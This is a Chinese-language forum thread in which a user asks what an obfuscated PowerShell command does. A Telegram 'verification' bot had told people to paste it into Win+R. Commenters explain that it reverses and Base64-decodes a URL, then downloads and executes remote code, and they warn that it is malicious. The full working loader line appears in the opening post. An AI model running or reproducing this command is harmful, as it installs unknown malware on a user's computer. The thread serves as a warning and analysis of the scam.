V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
andyiac
V2EX  ›  Windows

Window 网络代码分析 | 请不要轻易在自己电脑尝试

  •  
  •   andyiac · 19 小时 9 分钟前 · 1340 次点击

    有没有 window 高手帮忙看下这个代码干了啥

    powershell -c $r='0hHducWaatGe6ZTOvw0doZ1Lt92YuYDN3Fjcy0Gb5Ujax8yL6MHc0RHa';$u=($r[-1..-($r.Length)]-join '');&($u|%{&('iwr') ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($_)))|&('iex')}); 
    
    

    昨天一个 Telegram 群要验证是否是真人,提供了上面代码,让用户复制粘贴 Win+R 运行,问了下 chatgpt 提示说是执行了一段网络代码,具体是干什么不熟悉 Window 编程没能搞出来。

    有没有 Window 高手帮忙看下这代码到底是干啥了,是否有危险操作。

    不清楚风险请不要轻易在自己电脑尝试

    不清楚风险请不要轻易在自己电脑尝试

    不清楚风险请不要轻易在自己电脑尝试

    第 1 条附言  ·  18 小时 4 分钟前
    昨天运行了一次🥲,后来才感觉不安全,在犹豫要不要重下装系统
    13 条回复    2025-01-24 16:20:42 +08:00
    ysc3839
        1
    ysc3839  
       19 小时 1 分钟前 via Android
    没必要看,肯定有危险操作
    baysonfox
        2
    baysonfox  
       19 小时 1 分钟前
    "它将变量 $r 中的字符串逆序后再用 Base64 解码,然后通过 iwr 下载并用 iex 执行下载到的远程脚本,属于可疑或恶意行为。" ——ChatGPT

    100%在干坏事
    baysonfox
        3
    baysonfox  
       19 小时 0 分钟前   ❤️ 1
    antik24601
        4
    antik24601  
       19 小时 0 分钟前 via Android
    想都不用想肯定有问题,正常验证哪有这样的,字符串反转之后 base64 解码就是 payload 的 url ,看起来像是挖矿的
    Greendays
        5
    Greendays  
       18 小时 58 分钟前
    0hHducWaatGe6ZTOvw0doZ1Lt92YuYDN3Fjcy0Gb5Ujax8yL6MHc0RHa
    这串代码,反过来并用 base64 解码,得到一个脚本的地址:


    这是用 Deepseek 分析出来的
    Greendays
        6
    Greendays  
       18 小时 44 分钟前
    @Greendays

    按照 AI 的思路来(这个 AI 反转字符串搞错了),这段代码反转后是:

    aHR0cHM6Ly8xajU5bG0ycjF3NDYuY29tL1Zod0wvOTZ6eGtaaWcudHh0

    能匹配的最长的 Base64 编码是:

    aHR0cHM6Ly8xajU5bG0ycjF3NDYuY29tL1Zod0wvOTZ6eGtaaWcudH==

    解码出来后确实是一个看上去像是人机验证地址的网页:

    crab
        7
    crab  
       18 小时 42 分钟前   ❤️ 1
    最终下载 https=x=easypath.cyou/92374ybvt/y79v54822954.zip 执行。
    andyiac
        8
    andyiac  
    OP
       18 小时 1 分钟前
    @crab 在电脑里找到这个文件的加压目录了 :(

    noobjalen
        10
    noobjalen  
       17 小时 42 分钟前
    最后运行 ISDbg.exe
    serical
        11
    serical  
       16 小时 41 分钟前   ❤️ 1
    andyiac
        12
    andyiac  
    OP
       15 小时 34 分钟前
    确实是 Telegram 上的 Safeguard 中招的,第一次是让点图片验证,然后验证不通过,再验证就换成这个了

    https://imgur.com/IOQUdtW.png

    https://imgur.com/SpdSCN9.png
    twig
        13
    twig  
       15 小时 32 分钟前 via iPhone
    目测郭宇
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1045 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 26ms · UTC 23:53 · PVG 07:53 · LAX 15:53 · JFK 18:53
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.